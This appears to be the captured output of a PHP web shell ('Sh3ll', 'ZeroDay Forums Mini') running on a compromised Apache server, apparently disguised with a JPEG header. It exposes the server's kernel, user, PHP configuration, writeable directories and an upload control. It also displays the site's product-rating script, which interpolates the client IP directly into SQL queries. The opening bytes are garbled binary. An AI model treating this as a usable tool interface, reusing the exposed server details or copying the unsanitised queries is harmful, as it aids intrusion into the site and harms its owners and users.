����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/var/www/html/tien-dien/code/ajax/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/var/www/html/tien-dien/code/ajax/product_rating.php
<?php
global $DB, $CORE;

// Get input parameters
$product_id = isset($CORE->input['product_id']) ? intval($CORE->input['product_id']) : 0;
$rating = isset($CORE->input['rating']) ? intval($CORE->input['rating']) : 0;
$user_id = isset($ob_user->user_id) ? intval($ob_user->user_id) : null;

// Validate input
if ($product_id <= 0 || $rating < 1 || $rating > 5) {
    echo json_encode(['status' => 'error', 'message' => 'Invalid input parameters']);
    exit();
}

// Check if product exists
$product = $DB->fetch_row($DB->query("SELECT id FROM tb_product WHERE id='$product_id' AND status=0"));
if (!$product) {
    echo json_encode(['status' => 'error', 'message' => 'Product not found']);
    exit();
}

// Get user IP address
$ip_address = $CORE->ip;

// Check if user has already rated this product (by IP if not logged in, or by user_id if logged in)
if ($user_id) {
    $existing_rating = $DB->fetch_row($DB->query("SELECT rating_id FROM tb_product_ratings WHERE product_id='$product_id' AND user_id='$user_id'"));
} else {
    $existing_rating = $DB->fetch_row($DB->query("SELECT rating_id FROM tb_product_ratings WHERE product_id='$product_id' AND ip_address='$ip_address' AND user_id IS NULL"));
}

// Prepare data for database
$data = [
    'product_id' => $product_id,
    'rating' => $rating,
    'ip_address' => $ip_address,
    'created_at' => date('Y-m-d H:i:s')
];

if ($user_id) {
    $data['user_id'] = $user_id;
}

// Insert or update rating
if ($existing_rating) {
    // Update existing rating
    $rating_id = $existing_rating['rating_id'];
    $DB->query("UPDATE tb_product_ratings SET rating='$rating' WHERE rating_id='$rating_id'");
    $message = 'Rating updated successfully';
} else {
    // Insert new rating
    $DB->do_insert('tb_product_ratings', $data);
    $message = 'Rating submitted successfully';
}

// Get average rating for the product
$avg_rating = $DB->fetch_row($DB->query("SELECT AVG(rating) as average, COUNT(*) as count FROM tb_product_ratings WHERE product_id='$product_id'"));

// Return success response with average rating
echo json_encode([
    'status' => 'success',
    'message' => $message,
    'average' => round($avg_rating['average'], 1),
    'count' => $avg_rating['count']
]);

$DB->free_result();
exit();
?>

ZeroDay Forums Mini